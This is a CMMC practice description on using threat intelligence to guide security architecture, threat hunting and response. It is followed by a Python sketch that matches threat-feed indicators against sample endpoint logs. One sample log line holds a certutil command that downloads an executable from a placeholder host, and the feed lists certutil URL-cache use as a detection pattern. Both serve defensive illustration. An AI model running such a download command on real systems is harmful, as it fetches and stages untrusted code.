Requirement text: RM.4.150: Employ threat intelligence to inform the development of the system and
security architectures, selection of security solutions, monitoring, threat hunting, and response and recovery activities.
DISCUSSION FROM SOURCE: DRAFT NIST SP 800-171B
The constantly changing and increased sophistication of adversaries, especially the
advanced persistent threat (APT), makes it more likely that adversaries can successfully
compromise or breach organizational systems. Accordingly, threat intelligence can be
integrated into and inform each step of the risk management process throughout the system
development life cycle. This includes defining system security requirements, developing
system and security architectures, selecting security solutions, monitoring (including threat
hunting) and remediation efforts.
Support References:
• NIST SP 800-30 provides guidance on risk assessments.
• NIST SP 800-39 provides guidance on the risk management process.
• NIST SP 800-160-1 provides guidance on security architectures and systems security
engineering.
• NIST SP 800-150 provides guidance on cyber threat information sharing.
CMMC CLARIFICATION
Threat intelligence (See RM.4.149 and SA.3.169) provides an organization with a better
understanding of the adversaries and their TTPs. This understanding helps an organization
plan, design, architect, and integrate solutions in a manner that will help thwart adversary
activities. This understanding should be used to design the enterprise architecture as well
as the endpoint monitoring capabilities and to plan threat hunting actions. Threat
intelligence can be very valuable when an organization is building their defensive playbook.
Having defensive response and recovery actions planned prior to an attack taking place is
key to having efficient and timely defensive cyber operation actions.
Practice IR.4.100 requires a similar use of adversary knowledge for incident response and
execution.
Example 1
Your organization recently started subscribing to a threat feed service to gain valuable
intelligence on adversary actions and what is currently happening against other
organizations. Based on information gained from this service, your DCO team utilizes the
information to hunt for adversary TTPs received from the service every day. This
information helps provide up-to-date TTPs, and it also provides the latest adversarial actions
taking place across other organizations subscribing to the threat feed. This
information is invaluable in molding your architecture towards specific threats as the
information is received.
Example 2
Your new threat feed has recently sent out information that states a specific action against a
specific vendor solution is underway at various organizations similar to your own. This
information is passed to your DCO team for hunting operations, and the architecture team
utilizes it to make small adjustments to the organization's enterprise architecture that
prevent similar tactics from being successful in your environment.
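The daily feed-driven hunt that Examples 1 and 2 describe, written out as an added illustration (not part of the CMMC text or any vendor's feed format): the feed record, the telemetry lines and every indicator value are constructed for this example, and the freshness check reflects the "up-to-date" point made in Example 1.

```python
import json
from datetime import datetime, timedelta, timezone

# Constructed threat-feed record: hypothetical format and made-up values, not real IoCs.
FEED_TEXT = """{
  "published": "2024-05-01T06:00:00Z",
  "indicators": [
    {"type": "domain",  "value": "update-cdn.example.invalid", "ttp": "T1071.001"},
    {"type": "sha256",  "value": "aa11bb22cc33dd44aa11bb22cc33dd44aa11bb22cc33dd44aa11bb22cc33dd44", "ttp": "T1204.002"},
    {"type": "cmdline", "value": "certutil.exe -urlcache", "ttp": "T1105"}
  ]
}"""

# Constructed endpoint/proxy telemetry, one JSON object per line (made up for this example).
LOG_LINES = [
    '{"host": "ws-017", "domain": "update-cdn.example.invalid", "sha256": "", "cmdline": ""}',
    '{"host": "ws-042", "domain": "intranet.corp.invalid", "sha256": "", "cmdline": "CertUtil.exe -URLCache -f http://x.invalid/a.exe a.exe"}',
    '{"host": "ws-042", "domain": "", "sha256": "aa11bb22cc33dd44aa11bb22cc33dd44aa11bb22cc33dd44aa11bb22cc33dd44", "cmdline": ""}',
    '{"host": "ws-099", "domain": "www.example.invalid", "sha256": "", "cmdline": "notepad.exe"}',
]

def load_feed(text):
    feed = json.loads(text)
    feed["published"] = datetime.fromisoformat(feed["published"].replace("Z", "+00:00"))
    return feed

def feed_is_stale(feed, now, max_age=timedelta(days=1)):
    """A daily hunt should flag intelligence older than one cycle rather than hunt on it silently."""
    return now - feed["published"] > max_age

def matches(indicator, event):
    field = event.get(indicator["type"], "")
    if indicator["type"] == "cmdline":
        return indicator["value"].lower() in field.lower()  # substring, case-insensitive
    return field.lower() == indicator["value"].lower()      # exact match for domains and hashes

def hunt(feed, log_lines):
    """Return one finding per (event, indicator) hit, tagged with the feed's TTP for the DCO team."""
    findings = []
    for line in log_lines:
        event = json.loads(line)
        for ind in feed["indicators"]:
            if matches(ind, event):
                findings.append({"host": event["host"], "ttp": ind["ttp"], "indicator": ind["value"]})
    return findings

def hosts_by_ttp(findings):
    """Summary handed to the architecture team: which TTPs succeeded, and where."""
    summary = {}
    for f in findings:
        summary.setdefault(f["ttp"], []).append(f["host"])
    return summary
```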
References
• Draft NIST SP 800-171B 3.11.1e
• NIST CSF v1.1 ID.RA-2, ID.RA-3